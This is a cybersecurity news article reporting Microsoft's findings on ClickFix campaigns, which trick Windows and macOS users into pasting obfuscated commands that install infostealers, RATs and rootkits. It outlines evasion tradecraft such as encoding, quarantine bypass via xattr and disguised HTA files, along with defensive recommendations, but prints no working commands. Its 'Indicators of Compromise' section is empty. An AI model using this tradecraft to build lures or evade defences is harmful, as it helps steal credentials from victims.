Microsoft Flags Cross-Platform Attacks Targeting Windows and macOS

Microsoft Threat Intelligence has spotlighted the escalating adoption of the ClickFix social engineering technique, a sophisticated method that manipulates users into executing malicious commands on their devices, bypassing traditional automated security defenses.

Observed since early 2024, this tactic has targeted thousands of enterprise and end-user systems daily, delivering payloads such as Lumma Stealer infostealers, remote access trojans (RATs) like Xworm and AsyncRAT, loaders including Latrodectus, and rootkits based on modified r77 open-source code.

Rising Threat of Social Engineering

By exploiting users’ inclinations to resolve minor technical glitches such as fake CAPTCHA verifications or error prompts ClickFix integrates with phishing, malvertising, and drive-by compromises, often impersonating trusted brands to erode suspicion.

The attack chain typically initiates through deceptive landing pages that instruct victims to copy and paste obfuscated commands into the Windows Run dialog (Win + R), Windows Terminal, or PowerShell, leading to fileless malware injection into living-off-the-land binaries (LOLBins) like msbuild.exe or regasm.exe.

Microsoft notes that these payloads frequently operate in memory as .NET assemblies or Common Language Runtime (CLR) modules, enabling stealthy persistence, data exfiltration, and lateral movement.

A notable case study involves the Lampion malware campaign, active since May 2025, which targets sectors like government and finance in multiple countries via phishing emails containing ZIP-archived HTML redirects to spoofed tax authority sites.

This multi-stage infection downloads obfuscated VBScripts, schedules tasks for reconnaissance and antivirus evasion, and culminates in banking credential theft, though some instances failed to deliver the final payload due to commented-out code.

Cross-Platform Evolution

The technique’s adaptability extends beyond Windows, with campaigns since late May 2025 targeting macOS users to deploy Atomic macOS Stealer (AMOS), which harvests browser cookies, passwords, and cryptocurrency wallets.

In these scenarios, lures mimic services like Spectrum, prompting users to run Bash scripts that capture system passwords via dscl authentication and bypass macOS quarantine with xattr commands.

Threat actors enhance evasion through JavaScript obfuscation, remote code loading from disparate servers, and command-line tactics like Base64 encoding, string concatenation, escaped characters, and nested LOLBin executions (e.g., repeated cmd.exe invocations).

Arrival vectors include phishing with HTML attachments or URLs routed through traffic direction systems (TDS) like Prometheus, malvertising on pirated streaming sites that rename HTA scripts to media extensions (.mp3, .mp4), and drive-by compromises of WordPress sites spoofing Cloudflare Turnstile.

Microsoft identifies Storm-series actors (e.g., Storm-1607, Storm-0426) as key perpetrators, with campaigns impersonating entities like the US Social Security Administration to install tools like ScreenConnect for remote control.

Underground markets offer ClickFix kits for $200–$1,500 monthly, featuring customizable lures, VM detection bypass, and UAC evasion.

To counter this, Microsoft recommends user education on social engineering, enabling Defender XDR features like AMSI scanning for PowerShell and HTA scripts, network protection to block C2 domains, and attack surface reduction rules to restrict obfuscated script execution.

Detections span Microsoft Defender Antivirus (e.g., Behavior:Win32/ClickFix) and Endpoint alerts for suspicious RunMRU registry entries.

Indicators of Compromise (IOCs)

Find this News Interesting! Follow us on Google News, LinkedIn, and X to Get Instant Updates!